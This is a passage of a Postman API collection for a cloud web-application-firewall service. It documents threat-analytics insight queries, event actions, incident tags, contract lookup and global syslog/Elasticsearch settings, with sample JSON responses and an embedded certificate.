Events","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/insight?type=exposed_server&size=10","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","insight"],"query":[{"key":"type","value":"exposed_server"},{"key":"size","value":"10"}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Successfully\", \n    \"result\": {\n        \"type\": \"exposed_server\", \n        \"events\": [\n            {\n                \"id\": \"2009781812\", \n                \"app_name\": \"aws_test1\", \n                \"origin_server\": [\"54.89.9.72\"], \n                \"exposed_dns\": 0, \n                \"direct_access\": 1, \n                \"last_updated\": \"2022-08-11 21:31:40.828348+00:00\"\n            },   \n            {\n                \"id\": \"5467256126\", \n                \"app_name\": \"aws_test2\", \n                \"origin_server\": [\"52.78.82.9\"], \n                \"exposed_dns\": 0, \n                \"direct_access\": 1, \n                \"last_updated\": \"2022-08-11 21:31:41.434888+00:00\"\n            }\n        ], \n        \"prev_cursor\": \"eyJsYXN0X3VwZGF0ZWQiOiB7IlMiOiAiMjAyMi0wOC0xMVQyMTozMTo0MC44MjgzNDgrMDAwMCJ9LCAicmFuZ2VfaWQiOiB7IlMiOiAiZXhwb3NlZF9zZXJ2ZXIifSwgInVzZXJfaWQiOiB7IlMiOiAiZmVhZjA0OWUtOWE2OC0xMWViLWEyNjQtMGE3YTM0MDQzZDJmIn0sICJlcF9pZCI6IHsiUyI6ICIyMDA5NzgxODEyIn19\", \n        \"next_cursor\": \"\", \n        \"total\": 2\n    }\n}"},{"id":"a573b35a-d412-44d0-bc5c-d08e0755648c","name":"Get Trust IP Events","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/insight?type=trus_ip&size=10","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","insight"],"query":[{"key":"type","value":"trus_ip"},{"key":"size","value":"10"}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Successfully\", \n    \"result\": {\n        \"type\": \"trust_ip\", \n        \"events\": [\n            {\n                \"id\": \"6243178269\", \n                \"app_name\": \"aws_test1\", \n                \"category\": \"Tor\", \n                \"malicious_ip\": \"5.255.98.231\", \n                \"last_updated\": \"2022-08-11 22:06:54.851214+00:00\"\n            }, \n            {\n                \"id\": \"6243178269\", \n                \"app_name\": \"aws_test2\", \n                \"category\": \"Phishing\", \n                \"malicious_ip\": \"20.91.206.26\", \n                \"last_updated\": \"2022-08-11 22:06:54.866249+00:00\"\n            }\n        ], \n        \"prev_cursor\": \"eyJsYXN0X3VwZGF0ZWQiOiB7IlMiOiAiMjAyMi0wOC0xMVQyMjowNjo1NC44NTEyMTQrMDAwMCJ9LCAicmFuZ2VfaWQiOiB7IlMiOiAidHJ1c3RfaXAjNS4yNTUuOTguMjMxIn0sICJ1c2VyX2lkIjogeyJTIjogImZlYWYwNDllLTlhNjgtMTFlYi1hMjY0LTBhN2EzNDA0M2QyZiJ9LCAiZXBfaWQiOiB7IlMiOiAiNjI0MzE3ODI2OSJ9fQ==\", \n        \"next_cursor\": \"\", \n        \"total\": 2\n    }\n}"},{"id":"16b56bec-b209-4ffa-85ca-48329a4afffa","name":"Get Unprotected Host Events","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/insight?type=unprotected_host&size=10","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","insight"],"query":[{"key":"type","value":"unprotected_host"},{"key":"size","value":"10"}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Successfully\", \n    \"result\": {\n        \"type\": \"unprotected_host\", \n        \"events\": [\n            {\n                \"id\": \"6243178269\", \n                \"app_name\": \"aws_test1\", \n                \"host_name\": \"www.test.com\", \n                \"last_updated\": \"2022-08-11 22:06:54.851214+00:00\"\n            }, \n            {\n                \"id\": \"6243178269\", \n                \"app_name\": \"aws_test2\", \n                \"host_name\": \"www.test.com\", \n                \"last_updated\": \"2022-08-11 22:06:54.866249+00:00\"\n            }\n        ], \n        \"prev_cursor\": \"eyJsYXN0X3VwZGF0ZWQiOiB7IlMiOiAiMjAyMi0wOC0xMVQyMjowNjo1NC44NTEyMTQrMDAwMCJ9LCAicmFuZ2VfaWQiOiB7IlMiOiAidHJ1c3RfaXAjNS4yNTUuOTguMjMxIn0sICJ1c2VyX2lkIjogeyJTIjogImZlYWYwNDllLTlhNjgtMTFlYi1hMjY0LTBhN2EzNDA0M2QyZiJ9LCAiZXBfaWQiOiB7IlMiOiAiNjI0MzE3ODI2OSJ9fQ==\", \n        \"next_cursor\": \"\", \n        \"total\": 2\n    }\n}"},{"id":"306957dd-6424-403c-9d52-b9a0a0d0f2e6","name":"Get Monior Events","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/insight?type=monitor_service&size=10","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","insight"],"query":[{"key":"type","value":"monitor_service"},{"key":"size","value":"10"}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Successfully\",\n    \"result\": {\n        \"type\": \"monitor_service\", \n        \"events\": [\n            {\n                \"id\": \"2009781812\", \n                \"app_name\": \"test_app1\",\n                \"threat_type\": \"DDOS\", \n                \"event_info\": {\n                \"description\": \"Description...\",\n                \"recommend_action\": \"Actions...\"}, \n                \"last_updated\": \"2022-09-15 21:46:27.389867+00:00\"\n                }, \n            {\n                \"id\": \"8769450517\",\n                \"app_name\": \"test_app2\", \n                \"threat_type\": \"DDOS\", \n                \"event_info\": {\n                    \"description\": \"Description...\", \n                    \"recommend_action\": \"Action recommend...\"}, \n                    \"last_updated\": \"2022-09-19 22:50:06.162726+00:00\"\n                }\n        ], \n        \"prev_cursor\": \"eyJsYXN0X3VwZGF0ZWQiOiB7IlMiOiAiMjAyMi0wOS0xNVQyMTo0NjoyNy4zODk4NjcrMDAwMCJ9LCAicmFuZ2VfaWQiOiB7IlMiOiAibW9uaXRvcl9zZXJ2aWNlI25hbWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlIn0sICJ1c2VyX2lkIjogeyJTIjogImZlYWYwNDllLTlhNjgtMTFlYi1hMjY0LTBhN2EzNDA0M2QyZiJ9LCAiZXBfaWQiOiB7IlMiOiAiMjAwOTc4MTgxMiJ9fQ==\", \n        \"next_cursor\": \"\", \n        \"total\": 2\n    }\n}"},{"id":"478abd62-3513-4ad4-8b98-c34e35db808d","name":"Get Waf Config Alarm Events","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.fortiweb-cloud-dev.com/v1/threat_analytics/insight?type=waf_config_alarm&size=20&cursor=&forward=true","protocol":"https","host":["api","fortiweb-cloud-dev","com"],"path":["v1","threat_analytics","insight"],"query":[{"key":"type","value":"waf_config_alarm","description":"Events type should be in 'exposed_server', 'trust_ip', 'unprotectd_host'"},{"key":"size","value":"20","description":"An integer, the page size. The value shall be 10, 20, 30."},{"key":"cursor","value":"","description":"To list the items of the first page, leave the cursor value empty.\nTo go forward to next page, get the value of the \"next_cursor\" parameter in the result of the current page, then paste it here as the cursor value.\nTo go to the previous page, get the \"prev_cursor\" value, then paste it here as the cursor value.\n"},{"key":"forward","value":"true","description":"True: the next page;\nFalse: the previous page."}]}},"status":"OK","code":200,"_postman_previewlanguage":null,"header":null,"cookie":[],"responseTime":null,"body":"{\n  \"type\": \"waf_config_alarm\",\n  \"events\": [\n    {\n      \"id\": \"1320890039\",\n      \"app_name\": \"Jason_Insight\",\n      \"configuration\": \"Block Mode\",\n      \"status\": \"disable\",\n      \"last_updated\": \"2022-09-16 21:24:22.707370+00:00\"\n    }\n  ],\n  \"prev_cursor\": \"eyJlcF9pZCI6IHsiUyI6ICIxMzIwODkwMDM5In0sICJyYW5nZV9pZCI6IHsiUyI6ICJ3YWZfY29uZmlnX2FsYXJtI0Jsb2NrIE1vZGUifSwgInVzZXJfaWQiOiB7IlMiOiAiMjczNTEyMjItZGZhNy0xMWViLWEzMDctMWUwOWJiNDRkMzllIn0sICJsYXN0X3VwZGF0ZWQiOiB7IlMiOiAiMjAyMi0wOS0xNlQyMToyNDoyMi43MDczNzArMDAwMCJ9fQ==\",\n  \"next_cursor\": \"\",\n  \"total\": 1\n}"}],"_postman_id":"2a9115e2-172a-435d-866d-957843530472"},{"name":"Insight Events Action","id":"7bc85bd7-0693-411c-897a-99a12906922e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"url":"https://api.tim.waasonline.com/v1/threat_analytics/insight?id={{id}}&type={{type}}&action={{action}}","description":"<p>Execute insight events action.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <strong>Authentication</strong> section for API key secret details.</p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","threat_analytics","insight"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>Application epid</p>\n","type":"text/plain"},"key":"id","value":"{{id}}"},{"description":{"content":"<p>Events type should be in  'trust_ip', 'unprotectd_host'</p>\n","type":"text/plain"},"key":"type","value":"{{type}}"},{"description":{"content":"<p>Excute action to application; \n'apply': means approve and change configuration to related module\n'ack': means ignore the events</p>\n","type":"text/plain"},"key":"action","value":"{{action}}"}],"variable":[]}},"response":[{"id":"2a4ed96f-1bef-4aa0-947f-457bd1746916","name":"Apply Trust IP Events","originalRequest":{"method":"PUT","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/insight?id={{id}}&type=trust_ip&action={{action}}&malicious_ip={{ip}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","insight"],"query":[{"key":"id","value":"{{id}}"},{"key":"type","value":"trust_ip"},{"key":"action","value":"{{action}}","description":"Action should be 'apply' or 'ack'"},{"key":"malicious_ip","value":"{{ip}}","description":"Remove malicious IP from trust ip list"}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\"detail\": \"Successfully\"}"},{"id":"24fbfabd-ac28-4d96-9c62-ba5277481015","name":"Ack Monitor Events","originalRequest":{"method":"PUT","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/insight?id={{id}}&type=monitor_service&action={{action}}&threat_type={{type}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","insight"],"query":[{"key":"id","value":"{{id}}"},{"key":"type","value":"monitor_service"},{"key":"action","value":"{{action}}","description":"Action should be 'ack'"},{"key":"threat_type","value":"{{type}}","description":"Threat type of events"}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\"detail\": \"Successfully\"}"},{"id":"62b1a92f-26c8-4497-ae0e-603a81d44083","name":"Apply Unprotection Host Events","originalRequest":{"method":"PUT","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/insight?id={{id}}&type=unprotected_host&action={{action}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","insight"],"query":[{"key":"id","value":"{{id}}"},{"key":"type","value":"unprotected_host"},{"key":"action","value":"{{action}}","description":"Action should be 'apply' or 'ack'"},{"key":"","value":"","disabled":true}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\"detail\": \"Successfully\"}"},{"id":"fbf9f68e-d7b3-4357-b162-07eb28e3f05e","name":"Apply Waf Config Alarm Events","originalRequest":{"method":"PUT","header":[],"url":{"raw":"https://api.fortiweb-cloud.com/v1/threat_analytics/insight?id={{id}}&type=waf_config_alarm&status={{status}}&configuration={{configuration}}","protocol":"https","host":["api","fortiweb-cloud","com"],"path":["v1","threat_analytics","insight"],"query":[{"key":"id","value":"{{id}}","description":"Application epid"},{"key":"type","value":"waf_config_alarm","description":"Events type should be in  'trust_ip', 'unprotectd_host'"},{"key":"status","value":"{{status}}"},{"key":"configuration","value":"{{configuration}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":null,"header":null,"cookie":[],"responseTime":null,"body":"{\"detail\": \"Successfully\"}"}],"_postman_id":"7bc85bd7-0693-411c-897a-99a12906922e"},{"name":"Update Incident Tags","id":"381f92d4-f47d-46d1-bb34-a55619182465","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"{\"acknowledged\":true}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/threat_analytics/incidents/:incident_id","urlObject":{"protocol":"https","path":["v1","threat_analytics","incidents",":incident_id"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"id":"43376202-7ca8-49a3-a986-810ed5895f0b","type":"any","value":"{{incident_id}}","key":"incident_id"}]}},"response":[{"id":"ad843af9-afb3-4971-857d-9f903dcc34a6","name":"Tag as Acknowledged","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\"tag\":\"i_tag_01\",\"op\":\"add\"}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/incidents/:incident_id","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","incidents",":incident_id"],"variable":[{"key":"incident_id","value":"cloud_us-east-1_4_5"}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\"result\": \"Success\"}"},{"id":"335542a1-5cc0-4a55-ac61-0a2727a9b5a8","name":"Cancel Tag of Acknowledged","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\"tag\":\"i_tag_01\",\"op\":\"remove\"}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/incidents/:incident_id","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","incidents",":incident_id"],"variable":[{"key":"incident_id","value":"cloud_us-east-1_4_5"}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\"result\": \"Success\"}"},{"id":"4ff74df1-f11a-4060-a301-06bda6785a58","name":"Tag as  False Positive","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\"tag\":\"i_tag_02\",\"op\":\"add\"}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/incidents/:incident_id","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","incidents",":incident_id"],"variable":[{"key":"incident_id","value":"cloud_us-east-1_4_5"}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\"result\": \"Success\"}"},{"id":"856d2adf-818f-488b-9f81-d4edb095ea86","name":"Cancel Tag of False Positive","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\"tag\":\"i_tag_02\",\"op\":\"remove\"}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/incidents/:incident_id","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","incidents",":incident_id"],"variable":[{"key":"incident_id","value":"cloud_us-east-1_4_5"}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\"result\": \"Success\"}"}],"_postman_id":"381f92d4-f47d-46d1-bb34-a55619182465"},{"name":"Get Tags List Copy","id":"1e9eccf1-41bd-4538-b5ca-28ed003fbab1","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"https://api.tim.waasonline.com/v1/threat_analytics/tags","urlObject":{"protocol":"https","path":["v1","threat_analytics","tags"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"3715ecbc-6816-4e07-8b9f-a3635d1de1ea","name":"Get Tags List Successfully","originalRequest":{"method":"GET","header":[],"url":"https://api.tim.waasonline.com/v1/threat_analytics/tags"},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"[\n    {\n        \"id\": \"i_tag_01\",\n        \"color\": \"#76B10C\",\n        \"name\": \"Acknowledged\"\n    },\n    {\n        \"id\": \"i_tag_02\",\n        \"color\": \"#FFB500\",\n        \"name\": \"False Positive\"\n    },\n    {\n        \"id\": \"i_tag_03\",\n        \"color\": \"#E64552\",\n        \"name\": \"Action Required\"\n    },\n    {\n        \"id\": \"i_tag_04\",\n        \"color\": \"#5B9FB2\",\n        \"name\": \"Action Taken\"\n    },\n    {\n        \"id\": \"i_tag_05\",\n        \"color\": \"#B255A0\",\n        \"name\": \"Tag5\"\n    },\n    {\n        \"id\": \"i_tag_06\",\n        \"color\": \"#5DB78F\",\n        \"name\": \"Tag6\"\n    },\n    {\n        \"id\": \"i_tag_07\",\n        \"color\": \"#7B6E9A\",\n        \"name\": \"Tag7\"\n    },\n    {\n        \"id\": \"i_tag_08\",\n        \"color\": \"#0093C3\",\n        \"name\": \"Tag8\"\n    },\n    {\n        \"id\": \"i_tag_09\",\n        \"color\": \"#B15A2B\",\n        \"name\": \"Tag9\"\n    },\n    {\n        \"id\": \"i_tag_10\",\n        \"color\": \"#9D9A92\",\n        \"name\": \"Tag10\"\n    }\n]"}],"_postman_id":"1e9eccf1-41bd-4538-b5ca-28ed003fbab1"},{"name":"Update Tag Name Copy","id":"cc844d66-aebf-45c4-9821-0da322d8ffb3","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"{\"false_positive\":true}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/threat_analytics/tags/:tag_id","urlObject":{"protocol":"https","path":["v1","threat_analytics","tags",":tag_id"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"id":"d50935f0-9d66-488e-af99-3349a19de541","description":{"content":"<p>10 tags are supported. tag_id is like i_tag_01, i_tag_02, etc.</p>\n","type":"text/plain"},"type":"any","value":"{{tag_id}}","key":"tag_id"}]}},"response":[{"id":"1d68331f-0725-45fd-8b70-70a78a5bc4a4","name":"Update Tag Name Successfully","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\"name\":\"New_Tag_name\"}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/tags/:tag_id","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","tags",":tag_id"],"variable":[{"key":"tag_id","value":"i_tag_05"}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\"result\": \"Success\"}"}],"_postman_id":"cc844d66-aebf-45c4-9821-0da322d8ffb3"}],"id":"88355205-4b36-4261-bca2-4732fadeba85","_postman_id":"88355205-4b36-4261-bca2-4732fadeba85","description":""},{"name":"Contract","item":[{"name":"Get Contracts","id":"27d646a0-7618-4c0f-9edc-22b7b6a8e40b","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/contract","description":"<p>Get the contracts information.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","contract"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"11f6f4db-42d8-4924-b2cc-9e47268c6a53","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","description":"Token","type":"text"}],"url":"https://api.tim.waasonline.com/v1/contract"},"status":"OK","code":200,"_postman_previewlanguage":"Text","header":[],"cookie":[],"responseTime":null,"body":"{\n\t\"summary\": {\n\t\t\"used_sites\": 1, \n\t\t\"sum_sites\": 1, \n\t\t\"percentile_bandwidth\": 0.0, \n\t\t\"sum_bandwidth\": 5\n\t}, \n\t\"license\": {\n\t\t\"is_tenant\": true,\n\t\t\"sn\": \"**\",\n\t\t\"sum_sites\": 1,\n\t\t\"sum_bandwidth\": 10,\n\t\t\"start_date\": \"2019-10-11\",\n\t\t\"expiration_date\": \"2030-10-10\",\n\t\t\"status\": \"valid\",\n\t\t\"contract_list\": [{\n\t\t\t\"contract_number\": \"4776AS361279\",\n\t\t\t\"user_id\": \"4401c3e4-****-11ec-9839-36b8196f7513\",\n\t\t\t\"status\": \"valid\",\n\t\t\t\"contract_id\": \"4776AS361279\",\n\t\t\t\"bandwidth\": 10,\n\t\t\t\"license_type\": \"Bandwidth\",\n\t\t\t\"start_date\": \"2019-10-11\",\n\t\t\t\"end_date\": \"2030-10-10\"\n\t\t}, {\n\t\t\t\"contract_number\": \"5106JG88517\",\n\t\t\t\"user_id\": \"4401c3e4-****-11ec-9839-36b8196f7513\",\n\t\t\t\"status\": \"valid\",\n\t\t\t\"contract_id\": \"5106JG88517\",\n\t\t\t\"license_type\": \"Web Site\",\n\t\t\t\"applications\": 1,\n\t\t\t\"start_date\": \"2019-10-11\",\n\t\t\t\"end_date\": \"2030-10-10\"\n\t\t}]\n\t}\n}\n"}],"_postman_id":"27d646a0-7618-4c0f-9edc-22b7b6a8e40b"}],"id":"96716c4b-fc9a-4626-8e5e-b4ca0cd5c720","_postman_id":"96716c4b-fc9a-4626-8e5e-b4ca0cd5c720","description":""},{"name":"Get Global Setting","id":"4710a543-63e7-4208-8b40-d82dd5290a63","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/global-setting","description":"<p>Get the global setting configurations.</p>\n","urlObject":{"protocol":"https","path":["v1","global-setting"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"304c6167-2e90-47ff-a95c-8dca1aa195e0","name":"Success","originalRequest":{"method":"GET","header":[],"url":"https://api.tim.waasonline.com/v1/global-setting"},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"AuditLog\": {\n        \"protocol\": \"UDP\",\n        \"address\": \"www.example.test\",\n        \"port\": 514,\n        \"user_id\": \"45216d38-9735-11e9-9e8d-d209e2b3f7ec\",\n        \"syslog_type\": \"elog\",\n        \"cert_signed\": 1,\n        \"type\": \"default\",\n        \"value\": \"cat=audit timestamp={{ts}} level={{lv}} user_id={{uid}} user_name={{un}} endpoint_id={{eid}} endpoint_domain={{ed}} app_name=\\\"{{an}}\\\" action=\\\"{{act}}\\\" body=\\\"{{bd}}\\\"\",\n        \"facility\": \"local0\",\n        \"server_type\": \"syslog\"\n    },\n    \"ESServer\": {\n        \"password\": \"123456\",\n        \"address\": \"f459405714614c5a8624bdc20f1180b1.ap-southeast-1.aws.found.io\",\n        \"port\": \"9243\",\n        \"user_id\": \"45216d38-9735-11e9-9e8d-d209e2b3f7ec\",\n        \"syslog_type\": \"elog\",\n        \"server_type\": \"elasticsearch\",\n        \"username\": \"elastic\",\n        \"timestamp\": 0\n    },\n    \"WeekReport\": {\n        \"email_default\": 0,\n        \"email\": \"example@a.com\"\n    },\n    \"WeeklyEnable\": 1,\n    \"AuditEnable\": 1,\n    \"ServerType\": \"elasticsearch\",\n    \"NotificationEnable\": true,\n    \"user_perm\": \"rwa\",\n    \"AdvancedConfiguration\": \"disable\"\n}"}],"_postman_id":"4710a543-63e7-4208-8b40-d82dd5290a63"},{"name":"Update Global Setting","id":"d9108214-07d7-4731-ab66-94ad7b867bca","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Accept","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"AuditEnable\": 1,\n    \"WeeklyEnable\": 1,\n    \"ServerType\": \"elasticsearch\",\n    \"WeekReport\": {\n\t\t\"email\": \"fsun@example.com\",\n\t\t\"email_default\": 0\n    },\n\t\"AdvancedConfiguration\": \"disable\",\n    \"AuditLog\": {\n    \t\"address\": \"18.139.115.210\",\n    \t\"port\": \"30514\",\n    \t\"protocol\": \"SSL\",\n    \t\"cert_signed\": 0,\n    \t\"cert\": \"Certificate:=LF=    Data:=LF=        Version: 3 (0x2)=LF=        Serial Number: 2 (0x2)=LF=    Signature Algorithm: sha256WithRSAEncryption=LF=        Issuer: C=CN, ST=Beijing, L=Beijing, O=tim, CN=54.251.132.249=LF=        Validity=LF=            Not Before: Jun 12 01:57:36 2019 GMT=LF=            Not After : Jun 11 01:57:36 2020 GMT=LF=        Subject: C=CN, ST=Beijing, L=Beijing, O=tim, CN=60.247.121.226=LF=        Subject Public Key Info:=LF=            Public Key Algorithm: rsaEncryption=LF=                Public-Key: (2048 bit)=LF=                Modulus:=LF=                    00:a4:ac:00:47:e8:6c:40:c0:f4:14:77:a3:5a:28:=LF=                    93:61:90:40:88:06:cf:5b:06:6e:ad:e6:a7:f7:16:=LF=                    85:2e:92:32:fd:2d:e5:e6:e9:73:90:ec:03:2b:3f:=LF=                    00:a0:a9:a7:3c:48:50:f0:58:12:27:69:e4:18:09:=LF=                    bb:ce:96:2d:09:d6:1d:6d:10:4c:dd:3a:1d:81:8c:=LF=                    d0:6d:46:6f:05:f9:ec:1a:9b:9b:cc:36:a7:30:82:=LF=                    92:a8:46:88:45:08:28:1f:0b:36:a1:21:3d:f3:f2:=LF=                    ba:d3:3e:c6:32:3b:f2:68:94:ed:ed:60:db:03:fa:=LF=                    9a:a6:94:08:46:c9:05:14:ea:54:bd:19:06:6f:bf:=LF=                    37:22:a8:04:d7:ba:8e:f3:0a:4f:dd:55:ad:e0:88:=LF=                    00:9b:89:29:a5:39:d0:f2:11:57:3b:21:d4:b1:d3:=LF=                    88:6a:e4:e1:3a:89:6a:81:a5:cc:3d:6e:39:91:33:=LF=                    72:ee:87:97:43:57:c9:19:e1:9f:1d:d9:55:80:1c:=LF=                    a1:d1:fb:9c:62:03:48:f1:fa:61:1c:d9:89:22:d6:=LF=                    66:0a:aa:ea:d3:a4:0a:b6:7d:0b:0e:11:ce:50:91:=LF=                    a4:7b:98:95:b5:e9:f4:b4:5f:4b:3b:c3:2e:2c:3d:=LF=                    ba:7f:91:0b:5b:da:ba:e3:61:63:35:c2:33:8c:6d:=LF=                    5a:cb=LF=                Exponent: 65537 (0x10001)=LF=        X509v3 extensions:=LF=            X509v3 Basic Constraints: =LF=                CA:FALSE=LF=            Netscape Comment: =LF=                OpenSSL Generated Certificate=LF=            X509v3 Subject Key Identifier: =LF=                25:C7:8B:23:2D:40:F8:DC:12:61:0E:CB:49:70:C4:8B:A9:E2:71:A0=LF=            X509v3 Authority Key Identifier: =LF=                keyid:74:39:BF:75:15:11:F9:B4:C1:3E:9E:93:1E:15:4D:45:AD:66:F4:F1=LF==LF=    Signature Algorithm: sha256WithRSAEncryption=LF=         d0:fc:a7:de:08:33:4e:8c:86:e2:9b:b3:2f:a5:07:77:96:29:=LF=         2b:9c:e1:07:78:bf:68:24:ed:a4:b0:26:6d:4a:7a:2b:07:45:=LF=         c6:af:ad:1b:f1:2e:0d:49:c1:cb:2d:e7:76:87:34:8a:68:0b:=LF=         95:be:cb:e8:f1:35:c8:92:d1:70:74:ee:00:42:f7:06:0b:d1:=LF=         c4:0c:e6:45:80:38:a9:b0:f9:35:fe:ea:10:24:f5:40:f8:20:=LF=         42:ca:9d:4d:a8:7e:60:24:a6:92:be:8a:4c:37:4e:67:e7:d0:=LF=         c6:e7:c2:fd:34:67:59:54:fa:bf:0e:92:4f:1c:96:89:8f:3b:=LF=         49:69:4d:e2:fe:d2:75:bc:39:85:c7:b9:21:5e:b4:b2:59:24:=LF=         34:34:e2:58:ca:0a:44:9e:f7:a3:44:29:85:83:36:65:46:50:=LF=         9c:9c:26:8a:92:f3:d8:9f:c6:f8:a4:2f:fc:1f:25:d4:a8:e8:=LF=         06:3d:bb:4a:6c:db:b8:54:da:ad:06:08:63:ac:7e:00:a9:28:=LF=         e2:4d:e2:85:31:b6:21:1f:0b:2d:c2:bd:91:2b:85:93:f9:69:=LF=         5f:c9:76:51:74:65:0c:6b:4b:ba:25:33:70:ee:c4:03:50:e2:=LF=         0a:62:98:0d:9d:ca:61:ef:9c:62:80:b1:2e:a6:8f:7e:ca:59:=LF=         46:9e:7b:77=LF=-----BEGIN 